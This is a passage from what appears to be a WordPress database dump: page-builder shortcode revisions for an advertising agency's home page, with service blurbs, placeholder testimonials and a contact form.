custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:08:45','2020-08-07 20:08:45','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(593,1,'2020-08-07 20:09:32','2020-08-07 20:09:32','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" 